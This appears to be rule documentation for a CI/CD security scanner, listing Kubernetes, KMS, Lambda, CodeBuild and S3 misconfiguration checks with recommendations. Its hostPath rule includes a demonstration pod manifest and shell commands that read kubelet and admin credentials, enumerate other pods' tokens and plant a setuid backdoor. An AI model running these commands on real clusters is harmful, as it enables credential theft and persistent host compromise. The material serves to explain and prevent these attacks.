Recommendation. Set spec.automountServiceAccountToken: false on every workload that doesn't need to talk to the Kubernetes API. Auto-mounted SA tokens are a free credential for an attacker who lands a shell, without explicit opt-out the token sits at /var/run/secrets/kubernetes.io/serviceaccount/token ready to be exfiltrated. If the workload needs API access, leave it true but pair with a tight, dedicated RBAC role.
Source: K8S-012 in the Kubernetes provider.
K8S-013: Pod uses a hostPath volume HIGH 🔧 fix
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Some legitimate system DaemonSets need hostPath (log collectors, CSI node plugins). Those should be deployed with explicit security review and a narrow path:; this rule fires regardless because application workloads should never use hostPath.
Recommendation. Replace hostPath volumes with configMap, secret, emptyDir, persistentVolumeClaim, or CSI volumes. hostPath opens a direct read/write window onto the node's filesystem; combined with even mild container compromise it gives the attacker access to other pods' data, kubelet credentials, and the container runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2021-25741 (Kubernetes subpath symlink escape): a container with
hostPathplus subpath could traverse outside the volume boundary and read or modify arbitrary host files. Exploitable on any cluster permitting hostPath to non-system workloads. - TeamTNT / Kinsing crypto-jacking campaigns (2020-2022): cluster compromise reports repeatedly traced lateral movement from a single misconfigured pod to the underlying node via hostPath:/, then to kubelet credentials and other tenants. Sysdig and Aqua incident reports document the pattern.
Proof of exploit.
Vulnerable: pod mounts the host's root filesystem.
apiVersion: v1 kind: Pod metadata: name: attacker spec: containers: - name: shell image: busybox command: ["sleep", "infinity"] volumeMounts: - name: host-root mountPath: /host volumes: - name: host-root hostPath: path: / # full node filesystem
Attack from a shell inside the container:
# Read kubelet credentials and pivot to API server:
cat /host/var/lib/kubelet/kubeconfig
cat /host/etc/kubernetes/admin.conf
# Read service account tokens for every other pod on
# the node and impersonate them:
ls /host/var/lib/kubelet/pods//volumes/kubernetes.io~projected//token
# Drop a setuid binary and pin persistence on the host:
cp /bin/busybox /host/usr/local/bin/.bd
chmod 4755 /host/usr/local/bin/.bd
Safe: use scoped volume types that don't bridge to the host.
spec: volumes: - name: data persistentVolumeClaim: claimName: app-data
Source: K8S-013 in the Kubernetes provider.
K8S-014: Pod hostPath references a sensitive host directory CRITICAL
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Stricter than K8S-013: that rule flags any hostPath, this one upgrades to CRITICAL when the path is one of the well-known cluster-escape vectors.
Recommendation. Never mount the container runtime socket (/var/run/docker.sock, containerd.sock, crio.sock), kubelet credentials (/var/lib/kubelet), the cluster config (/etc/kubernetes), the host root (/), or /proc / /sys / /etc into a workload container. Each of these is a one-line cluster takeover. If a container genuinely needs node-level metrics, use an exporter DaemonSet with a narrowly-scoped read-only mount.
Source: K8S-014 in the Kubernetes provider.
K8S-015: Container missing resources.limits.memory MEDIUM
Evidences: CM-6 Configuration Settings.
How this is detected. Init containers and ephemeral containers are also checked: a leaking init container holds a slot on the node until it completes and can crowd out other pods just as readily as an application container.
Recommendation. Set resources.limits.memory on every container. Without a memory limit, a leaking or compromised container can consume the node's RAM until the kernel OOM-kills neighbouring pods, taking down workloads that share the node. Pair the limit with a requests.memory to inform the scheduler.
Source: K8S-015 in the Kubernetes provider.
K8S-016: Container missing resources.limits.cpu LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Lower severity than K8S-015 because CPU throttling is self-healing (workloads slow down rather than die) and some controllers (e.g. SchedulerProfile, LimitRange) supply a cluster-default cpu limit transparently.
Recommendation. Set resources.limits.cpu on every container. CPU throttling is the kernel's defense against a neighbour consuming all node cycles, without a limit, a compromised container can stall everything else on the node, including the kubelet. Pair the limit with a requests.cpu for scheduling.
Source: K8S-016 in the Kubernetes provider.
K8S-017: Container env value carries a credential-shaped literal CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS access keys outright, plus credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal. valueFrom entries are always safe (no inline value).
Recommendation. Replace literal env[].value entries that hold credentials with env[].valueFrom.secretKeyRef or envFrom.secretRef. A literal env value lives in the manifest YAML. It gets committed to git, surfaced by kubectl get pod -o yaml, and embedded in audit logs. Externalising into a Secret (and ideally a SealedSecret / ExternalSecret / SOPS-encrypted source) keeps the value out of the manifest.
Source: K8S-017 in the Kubernetes provider.
K8S-018: Secret stringData/data carries a credential-shaped literal CRITICAL
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Walks both stringData (plain text) and data (base64). Base64-encoded values are decoded and checked for AKIA-shaped AWS keys. Credential-shaped key NAMES with any non-empty value are flagged regardless of encoding, even if the value is the literal placeholder REPLACE_ME, having the name in the manifest is a maintenance footgun.
Recommendation. A Kind: Secret manifest committed to git defeats every secret-management story Kubernetes claims to provide, the base64 encoding in data is not encryption. Replace with SealedSecrets (Bitnami), ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection. If the manifest must remain in git, the only acceptable contents are placeholders that are filled in by an operator at apply time.
Source: K8S-018 in the Kubernetes provider.
K8S-019: Workload deployed in the 'default' namespace LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Severity is LOW because in a well-curated cluster the default namespace is empty by policy. If your cluster treats default as a sandbox you can suppress this rule via .pipelinecheckignore.
Recommendation. Set metadata.namespace to a dedicated namespace per workload (or per environment). The default namespace tends to accumulate cluster-wide RoleBindings, NetworkPolicies, and operators that grant broader access than intended; placing application workloads there means every privilege grant in default applies to them. A purpose-built namespace also lets you enforce Pod Security Standards (pod-security.kubernetes.io/enforce label) scoped to that workload.
Source: K8S-019 in the Kubernetes provider.
K8S-020: ClusterRoleBinding grants cluster-admin or system:masters CRITICAL 🔧 fix
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. The rule fires on a ClusterRoleBinding whose roleRef.name is cluster-admin, admin, or system:masters. Subject type does not matter, even binding cluster-admin to a Group is a cluster-takeover risk.
Recommendation. Replace cluster-admin / system:masters bindings with narrowly-scoped ClusterRoles or namespace-scoped Roles. Granting cluster-admin to a service account is equivalent to giving every pod that uses it root on every node, credential theft from any such pod becomes immediate cluster takeover. Audit-log every existing cluster-admin binding and replace each with the minimum verbs/resources the consumer actually needs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Tesla Kubernetes dashboard compromise (RedLock, 2018): an unauthenticated Kubernetes dashboard exposed to the internet held tokens for service accounts bound to cluster-admin. Attackers used the dashboard credentials to deploy crypto-mining workloads with full cluster access. Least-privilege RBAC would have capped the blast radius even after dashboard exposure.
- Argo CD CVE-2022-24348 / CVE-2022-24768 chain (2022): directory traversal plus a default cluster-admin install let any project member exfiltrate cluster-wide secrets. Argo's recommendation post-fix was to scope the controller's RBAC away from cluster-admin so a similar future bug couldn't escalate the same way.
Source: K8S-020 in the Kubernetes provider.
K8S-021: Role or ClusterRole grants wildcard verbs+resources HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Fires on any rule entry where BOTH verbs and resources contain a literal "*". A wildcard in only one of the two is still risky but is often a legitimate read-everything pattern (e.g. monitoring); this rule targets the strict superset 'do anything to everything'.
Recommendation. Replace verbs: ["*"] and resources: ["*"] with explicit lists. Wildcards bypass the principle of least privilege: today they grant read pods and tomorrow they grant delete crds because a new resource was registered in that apiGroup. Explicit verbs (get, list, watch) and explicit resources (configmaps, services) keep grants stable across cluster upgrades.
Source: K8S-021 in the Kubernetes provider.
K8S-022: Service exposes SSH (port 22) MEDIUM
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Mirrors DF-013 (EXPOSE 22 in a Dockerfile) at the Service level. The check fires on Service ports whose port or targetPort is 22, regardless of Service type, a NodePort/LoadBalancer 22 is dramatically worse but a ClusterIP 22 still indicates an sshd container somewhere.
Recommendation. Containers should not run sshd. If you need an interactive shell into a running pod, use kubectl exec (subject to RBAC) or kubectl debug. Removing the port-22 Service removes a pre-auth network surface that's a frequent lateral-movement target after initial cluster compromise.
Source: K8S-022 in the Kubernetes provider.
K8S-023: Namespace missing Pod Security Admission enforcement label HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Pod Security Admission (PSA) replaced the deprecated PodSecurityPolicy in 1.25. The three levels are privileged, baseline, and restricted; baseline is a sensible production default and restricted matches the spirit of K8S-005..010. kube-system is exempt by convention since control-plane pods may legitimately need elevated permissions.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/enforce to baseline or restricted on every Namespace. Without an enforce label the namespace runs the cluster's default policy, which on most installations is privileged and silently admits pods that violate every K8S-002..010 rule.
Known false positives.
- Single-tenant clusters running only operator-managed workloads may apply PSA via an admission webhook instead. The label-based check can't see that.
Source: K8S-023 in the Kubernetes provider.
K8S-024: Container missing both livenessProbe and readinessProbe MEDIUM
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Init containers and ephemeral debug containers are exempt, neither makes sense to probe. Jobs and CronJobs are also exempt because Kubernetes treats them as one-shot work; completion is the lifecycle signal, not health.
Recommendation. Define at least one of livenessProbe or readinessProbe on every long-running container. Without probes, a wedged pod stays listed as Running and keeps receiving traffic, which masks incidents and amplifies the blast radius of a single faulty replica.
Source: K8S-024 in the Kubernetes provider.
K8S-025: System priority class used outside kube-system HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. The kubelet reserves the two system-* priority classes for its own pods (kube-proxy, CNI agents). Granting them to a user workload also grants the right to preempt and evict anything below 2000000000, which is every non-system pod on the cluster. Outside kube-system this is almost always a misconfiguration copy-pasted from a control-plane manifest.
Recommendation. Reserve system-cluster-critical and system-node-critical priority classes for control-plane workloads in kube-system. Application pods that adopt them gain the right to evict normal workloads under resource pressure, which is a quiet path to a cluster-wide outage if the application has a bug or the attacker has any control over its spec.
Source: K8S-025 in the Kubernetes provider.
K8S-026: LoadBalancer Service has no loadBalancerSourceRanges HIGH
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. Internal-only services should use type: ClusterIP (and an Ingress for HTTP) or set the cloud-provider-specific internal-LB annotation. loadBalancerSourceRanges is the Kubernetes-native, cloud-portable way to scope an external LB; cloud-specific firewalls (AWS security groups, GCP firewall rules) are equivalent at the L4 level but invisible to a manifest scanner.
Recommendation. Restrict every Service of type: LoadBalancer with spec.loadBalancerSourceRanges. The default behavior is to provision an internet-facing load balancer that accepts traffic from 0.0.0.0/0, which exposes whatever the Service fronts to the entire internet. A short list of CIDRs scoped to known clients (office IPs, a NAT gateway, peered VPCs) removes the pre-auth attack surface entirely.
Source: K8S-026 in the Kubernetes provider.
K8S-027: Ingress has no TLS configuration MEDIUM
Evidences: SC-8 Transmission Confidentiality and Integrity, SC-13 Cryptographic Protection.
How this is detected. An Ingress with no spec.tls (or an empty list) terminates HTTP at the load balancer and proxies plaintext upstream. Ingress controllers will respect ssl-redirect annotations, but those are advisory until tls: is populated. If the Ingress is intentionally HTTP-only (e.g. an ACME challenge endpoint or an internal-only path served behind a network policy), suppress via .pipelinecheckignore with a short rationale rather than leaving it open.
Recommendation. Add a spec.tls block to every Ingress that fronts an HTTP backend. Each entry pairs one or more hostnames with a Secret holding the certificate / key, the canonical pattern is to provision the Secret via cert-manager and a ClusterIssuer pointing at Let's Encrypt or an internal CA. Plaintext-only Ingress lets a network attacker downgrade the connection and read or rewrite request bodies, which matters for any path carrying credentials, session cookies, or PII.
Source: K8S-027 in the Kubernetes provider.
K8S-028: Container declares hostPort MEDIUM 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. hostPort was the pre-Service way to publish a pod's port and survives in legacy manifests. Modern clusters use Services, which integrate with the kube-proxy, ingress controllers, and NetworkPolicies. hostPort is invisible to all of those, a port-scan from any other pod that knows the node IP reaches the workload directly. If a DaemonSet legitimately needs it (host-agent shape), suppress this rule with a brief .pipelinecheckignore rationale rather than leaving it open across the catalog.
Recommendation. Drop hostPort from container ports and use a Service (ClusterIP / NodePort / LoadBalancer) to publish the workload. hostPort binds directly to the node IP, bypasses the cluster's network model, and creates a node-level scheduling constraint that fails replicas with the same port. Workloads that genuinely need node-port binding (some CNI/storage agents) should declare it on a DaemonSet with hostNetwork: true already approved by review.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-028 in the Kubernetes provider.
K8S-029: RoleBinding grants permissions to the default ServiceAccount HIGH 🔧 fix
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. Fires when a RoleBinding or ClusterRoleBinding lists kind: ServiceAccount, name: default among its subjects. kube-system, kube-public, and kube-node-lease are exempt because control-plane bootstrap manifests legitimately grant the default SA there.
Recommendation. Bind permissions to a dedicated ServiceAccount, not to default. Every pod that omits serviceAccountName runs as the namespace's default SA, so a binding to it grants the same verbs to every untargeted pod in that namespace, including future workloads. Create a purpose-built SA, set automountServiceAccountToken: false on the default, and bind to the new SA explicitly.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts that intentionally re-use the default SA in single-tenant namespaces. Consider creating a named SA anyway. It keeps the audit log unambiguous about which workload made an API call.
Source: K8S-029 in the Kubernetes provider.
K8S-030: Workload schedules onto a control-plane node HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Fires on a non-system workload whose spec.nodeSelector contains a control-plane role label, OR whose spec.tolerations carries an entry with a control-plane taint key. Either condition is sufficient to land the pod on the control plane (the toleration is what survives the node taint; the nodeSelector picks the node).
Recommendation. Drop the nodeSelector and tolerations entries that target node-role.kubernetes.io/control-plane (or the legacy master spelling) from non-system workloads. A pod scheduled on a control-plane node shares the kernel with the API server, etcd, and kubelet credentials, credential theft from any such pod yields cluster-wide takeover. Application workloads belong on dedicated worker nodes; system add-ons that legitimately need control-plane scheduling should run as a DaemonSet in kube-system.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Audit/log shippers and CNI agents in kube-system are exempt by namespace. A workload that legitimately needs to run on the control plane outside kube-system is rare enough to warrant an explicit
.pipelinecheckignorerationale.
Source: K8S-030 in the Kubernetes provider.
K8S-031: Namespace missing PSA warn label LOW
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Pod Security Admission supports three modes: enforce (reject), audit (log to API audit), and warn (return a kubectl warning). K8S-023 covers enforce; this rule covers warn. The convention from upstream PSA docs is to set warn to the next-strictest tier above your current enforce so an upgrade from baseline to restricted is a predictable rollout, not a surprise.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/warn on every Namespace, ideally one tier ahead of the enforce label (e.g. enforce: baseline + warn: restricted). The warn level surfaces violations as kubectl apply warnings without rejecting the resource, developers see what would break before an enforcement upgrade lands.
Known false positives.
- Single-tenant clusters may set
warnandauditglobally via the AdmissionConfigurationdefaults:block instead of per-namespace labels. The label-based check can't see that.
Source: K8S-031 in the Kubernetes provider.
K8S-032: Namespace lacks default-deny NetworkPolicy MEDIUM
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. Kubernetes' default network model is allow-everything: without any NetworkPolicy targeting a namespace, every pod can talk to every other pod across every namespace, and every pod can reach the internet. A default-deny policy flips the default to deny, so the only flows that work are those an explicit allow policy permits. The check fires on namespaces declared in the manifest set that have at least one workload but no default-deny NetworkPolicy covering them. Cross-doc correlation: it walks the full manifest stream to match Namespace/workload/NetworkPolicy across files.
Recommendation. Apply a default-deny NetworkPolicy in every namespace that carries workloads. The canonical shape is podSelector: {} (matches every pod) plus policyTypes: [Ingress, Egress] with no ingress: / egress: rules, every flow is denied unless a more permissive NetworkPolicy in the same namespace explicitly allows it. Pair with per-workload allow-list policies for the flows the application actually needs.
Known false positives.
- Mesh-managed clusters (Istio, Linkerd, Cilium ClusterMesh) often delegate L4 default-deny to the mesh's authorization policy. The check only looks at native NetworkPolicy and won't see that.
- kube-system / kube-public / kube-node-lease are exempt, control-plane components frequently need open networking and have their own admission-time guards.
Source: K8S-032 in the Kubernetes provider.
K8S-033: Namespace lacks ResourceQuota or LimitRange MEDIUM
Evidences: CM-6 Configuration Settings, SI-2 Flaw Remediation.
How this is detected. Without a ResourceQuota, a single namespace can consume the cluster's entire scheduling capacity, a fork bomb in a CronJob, a memory leak in a Deployment, or a cryptominer that landed via a fork-PR build can starve every other tenant. Without a LimitRange, individual pods without explicit resources: requests get a default of zero, the scheduler treats them as best-effort and packs them on any node, including ones already at memory pressure. The two work together: quota caps the aggregate, range caps the per-workload baseline. Cross-doc correlation: walks the manifest stream to match Namespace / workload / ResourceQuota / LimitRange across files.
Recommendation. Apply a ResourceQuota and a LimitRange to every namespace that hosts application workloads. ResourceQuota caps the namespace's total CPU / memory / pod / object consumption; LimitRange enforces per-pod request / limit defaults so a workload that forgets to declare its own doesn't get unbounded scheduling. Together they bound the blast radius of a runaway, leaky, or attacker-driven pod explosion to a single namespace.
Source: K8S-033 in the Kubernetes provider.
K8S-034: ServiceAccount automountServiceAccountToken not explicitly false MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. K8S-012 covers the pod-level automountServiceAccountToken setting; this rule covers the same control at the ServiceAccount level. The two are complementary: the SA-level default flips the cluster-wide baseline (true -> false), the pod-level override re-enables only where needed. Without the SA-level disable, every pod that doesn't set its own override mounts a token that can call the K8s API as that SA, a useful credential for an attacker who lands code in any pod, regardless of the workload's own intent.
Recommendation. Set automountServiceAccountToken: false at the ServiceAccount level for every SA that doesn't actively need to call the Kubernetes API. The pods that legitimately do (operators, sidecars that read namespaces, controllers) can opt back in per-pod via spec.automountServiceAccountToken: true. The default is mount-everywhere, which is the wrong direction for least privilege.
Known false positives.
- Operator / controller workloads (cert-manager, metrics-server, ingress controllers) legitimately need API access from every pod. Their dedicated SAs should keep automount enabled, leave them out of the cluster-wide disable.
defaultSA in every namespace is the high-fire case worth disabling.
Source: K8S-034 in the Kubernetes provider.
K8S-035: Container securityContext.runAsUser is 0 HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. K8S-007 covers runAsNonRoot: false (the boolean form). This rule covers the explicit numeric form: a container that sets runAsUser: 0 runs as root regardless of runAsNonRoot being declared elsewhere. Kubernetes won't reject the spec, it just runs the container as root. The two rules are paired so neither shape slips through alone. The pod-level securityContext.runAsUser inherits to every container that doesn't override it; this rule fires on the effective UID, walking pod-level first then per-container override.
Recommendation. Set securityContext.runAsUser to a non-zero UID (e.g. 1000 or any application-specific value) on every workload container. The corresponding runAsGroup and fsGroup should also be non-zero. Root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Source: K8S-035 in the Kubernetes provider.
K8S-036: ServiceAccount imagePullSecrets references missing Secret MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Cross-doc correlation: walks every ServiceAccount's imagePullSecrets and confirms the named Secret exists in the same namespace within the manifest set. Misses two cases: secrets created out-of-band (Sealed Secrets, External Secrets, or operator-applied ones) and SAs whose namespace is implicit / not declared in the manifest set. For those, the rule passes, false-negative-friendly.
Recommendation. Create the missing Kind: Secret of type: kubernetes.io/dockerconfigjson (or dockercfg) in the same namespace before applying the ServiceAccount, or fix the imagePullSecrets reference name. A dangling reference doesn't fail apply, kubelet silently falls back to anonymous registry pulls on every image fetch. Workloads either pull a different image than the operator intended or fail at runtime with ImagePullBackOff after the registry rate-limits the unauthenticated client.
Known false positives.
- Manifests rendered for partial deployment where the secret lives in a parallel manifest set the scanner doesn't see (separate ArgoCD application, Vault-injected, ESO-synced). Add
# pipeline-check: ignore K8S-036or ignore the specific SA name to silence.
Source: K8S-036 in the Kubernetes provider.
K8S-037: ConfigMap data carries a credential-shaped literal HIGH
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Companion to K8S-018 (which scans Kind: Secret). Walks ConfigMap data and binaryData for AKIA-shaped AWS keys and credential-shaped key NAMES. Even when the value is a placeholder, having api_key: REPLACE_ME in a ConfigMap is a maintenance footgun, someone will fill it in and commit. RBAC scoping for configmaps is typically much broader than secrets, so any credential leak via this path reaches a wider audience.
Recommendation. Move the value out of the ConfigMap. Secrets belong in Kind: Secret (better: SealedSecrets, ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection). ConfigMaps are intended for non-sensitive config and are mounted into pods without the access controls Secrets carry, the RoleBinding for configmaps:get is typically far broader than the one for secrets:get. A credential in a ConfigMap is effectively unprotected once any pod can read the namespace's config.
Known false positives.
- ConfigMaps that legitimately carry placeholder names (
DEBUG_TOKEN_FORMAT,LICENSE_KEY_HEADER) where the VALUE is a format hint rather than a credential. Rename the key to avoid the credential-shaped name.
Source: K8S-037 in the Kubernetes provider.
K8S-038: NetworkPolicy ingress / egress allows all sources or destinations MEDIUM
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. K8S-032 covers the absence of a default-deny NetworkPolicy. This rule covers the inverse: a NetworkPolicy that exists but contains an ingress: rule with no from: (allow from all) or no ports: filter, or an egress: rule with no to: filter. The from: [] / to: [] shorthand is the canonical mistake. A rule that lists specific peers via podSelector / namespaceSelector / ipBlock passes.
Recommendation. Replace the empty from: [] / to: [] rule with an explicit from: [{podSelector: {matchLabels: {…}}}] or from: [{namespaceSelector: {matchLabels: {…}}}] that names the legitimate peer. An empty from / to peers list means every source / destination, every pod in every namespace, plus every external IP. This is indistinguishable from having no NetworkPolicy at all for the targeted pod, but visually appears to enforce a policy (the false-sense-of-security failure mode is worse than no policy).
Known false positives.
- Policies intentionally allowing world traffic to a public ingress controller pod ({app: nginx-ingress, public: true}). Add
# pipeline-check: ignore K8S-038on the specific NetworkPolicy if the wide-open shape is deliberate.
Source: K8S-038 in the Kubernetes provider.
K8S-039: Pod uses shareProcessNamespace: true MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. shareProcessNamespace: true makes every container in the pod share a single PID namespace. Any container can then enumerate every other container's processes (ps), read their environment variables and CLI args from /proc/<pid>/, send them signals, and (with the right capabilities) ptrace them. A compromised sidecar, debug shell, logging agent, observability exporter, gets a free pivot into every primary container's secrets. The default is false; setting it explicitly to true is the failing shape.
Recommendation. Drop spec.shareProcessNamespace: true from the pod spec. Containers in the pod will go back to having isolated PID namespaces, each sees only its own processes, can't ptrace neighbors, and can't read their /proc/<pid>/environ for env-var-leaked secrets. If the requirement is sidecar-style log collection or process-level cooperation, prefer a sidecar pattern that exchanges data through a shared volume rather than collapsing the namespace.
Known false positives.
- Debug pods that explicitly need
ps/straceacross container boundaries, but those are typically ephemeralContainers attached to a running pod, not long-lived pod specs in a manifest. If a permanent workload genuinely requires it, ignore the rule with a documented justification.
Source: K8S-039 in the Kubernetes provider.
K8S-040: Container securityContext.procMount: Unmasked HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. procMount: Unmasked is rarely needed in practice. It exists for nested-container / KubeVirt scenarios where the container itself runs an inner container runtime that needs to set up its own /proc masking. For an ordinary application container, Unmasked is a runtime-isolation regression that exposes kernel-information paths and writable /proc/sys entries to the workload. Pod Security Standards classify Unmasked as 'restricted'-violating; the rule fires when any container (containers, initContainers, ephemeralContainers) explicitly sets procMount: Unmasked.
Recommendation. Remove securityContext.procMount: Unmasked (or set it explicitly to Default). The default Default procMount type masks several kernel- and node-information paths under /proc (/proc/asound, /proc/acpi, /proc/kcore, /proc/keys, /proc/latency_stats, /proc/timer_list, /proc/timer_stats, /proc/sched_debug, /proc/scsi) and remounts /proc/sys as read-only. These maskings are what stop a container from reading the host's kernel structures or writing to /proc/sys and breaking the kernel out of namespace isolation. Unmasked undoes all of that.
Source: K8S-040 in the Kubernetes provider.
KMS-001: KMS customer-managed key has rotation disabled MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection.
How this is detected. Annual rotation regenerates the underlying key material for the same CMK ARN. Existing ciphertexts can still be decrypted (KMS keeps old material around), but new encrypts use the new material, so a cryptographic exposure (side-channel, an accidental export, an old compromised offline backup) only protects ciphertexts from before the rotation.
Recommendation. Enable annual rotation on every customer-managed KMS key used for CI/CD artifact, log, and secret encryption. Unrotated CMKs keep the same key material indefinitely, so a single cryptographic exposure (side-channel, accidental export) is permanent.
Source: KMS-001 in the AWS provider.
KMS-002: KMS key policy grants wildcard KMS actions HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. kms:* on a key policy is administrative authority over the cipher boundary: CancelKeyDeletion, ScheduleKeyDeletion, ReEncrypt, UpdateKeyDescription, and the data-plane decrypt actions all collapse into one grant. A CI/CD principal almost never needs more than the data-plane subset (Decrypt / GenerateDataKey / Encrypt).
Recommendation. Replace kms:* grants with specific actions needed by the caller (e.g. kms:Decrypt, kms:GenerateDataKey). Key-policy wildcard grants let any holder of the principal re-key, schedule deletion, or export material at will.
Source: KMS-002 in the AWS provider.
LMB-001: Lambda function has no code-signing config HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Lambda code-signing config + a Signer profile (SIGN-001) validates that an uploaded zip was signed by a known profile before it's allowed to run. Without one, anyone who reaches lambda:UpdateFunctionCode, a CI/CD role compromise, a misattached IAM policy, can replace the function's code with no chain-of-custody check.
Recommendation. Create an AWS Signer profile, reference it from an aws_lambda_code_signing_config with untrusted_artifact_on_deployment = Enforce and attach that config to the function. Without one, the Lambda runtime will execute any code that a principal with lambda:UpdateFunctionCode uploads.
Source: LMB-001 in the AWS provider.
LMB-002: Lambda function URL has AuthType=NONE HIGH
Evidences: AC-3 Access Enforcement.
How this is detected. A Lambda function URL with AuthType=NONE is a public HTTPS endpoint. Anyone who knows the URL can invoke. This is sometimes deliberate (a webhook receiver) but the deliberate version typically signs / validates inside the function, the rule fires regardless because the IAM-side control isn't there.
Recommendation. Set the function URL auth_type to AWS_IAM and grant lambda:InvokeFunctionUrl through IAM. NONE exposes the function to the public internet without authentication.
Source: LMB-002 in the AWS provider.
LMB-003: Lambda function env vars may contain plaintext secrets HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. Lambda env vars are world-readable to any principal with lambda:GetFunctionConfiguration, much wider than the principal that can invoke the function. They also persist in CloudFormation drift, change-sets, and CloudTrail events. A secret in a Lambda env var is essentially exposed to anyone with read access to the account.
Recommendation. Move secrets out of Lambda environment variables and into Secrets Manager or SSM Parameter Store. Environment variables are visible to anyone with lambda:GetFunctionConfiguration and persist in CloudTrail events, which keeps the secret in audit logs.
Source: LMB-003 in the AWS provider.
LMB-004: Lambda resource policy allows wildcard principal CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A wildcard-principal Allow on a Lambda function resource policy lets anyone invoke. The legitimate case is a service principal (API Gateway, S3 events) where AWS fills in the SourceArn/SourceAccount at invoke time, without those conditions, any account using that service can invoke.
Recommendation. Remove Allow statements with Principal: '*' from every Lambda function resource policy, or scope them with a SourceArn / SourceAccount condition. Service principals (e.g. apigateway.amazonaws.com) are the common legitimate case, ensure they carry a condition.
Source: LMB-004 in the AWS provider.
PBAC-001: CodeBuild project has no VPC configuration HIGH
Evidences: SC-7 Boundary Protection.
How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space, egress to the public internet is unrestricted, every package registry / CDN / arbitrary endpoint is reachable. Inside a VPC, security-group + VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.
Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.
Source: PBAC-001 in the AWS provider.
PBAC-002: CodeBuild service role shared across multiple projects MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius, a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.
Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.
Source: PBAC-002 in the AWS provider.
S3-001: Artifact bucket public access block not fully enabled CRITICAL
Evidences: AC-3 Access Enforcement, AU-9 Protection of Audit Information, SC-7 Boundary Protection.
How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.
Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
Source: S3-001 in the AWS provider.
S3-002: Artifact bucket server-side encryption not configured HIGH
Evidences: AU-9 Protection of Audit Information, SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection, SC-28 Protection of Information at Rest.
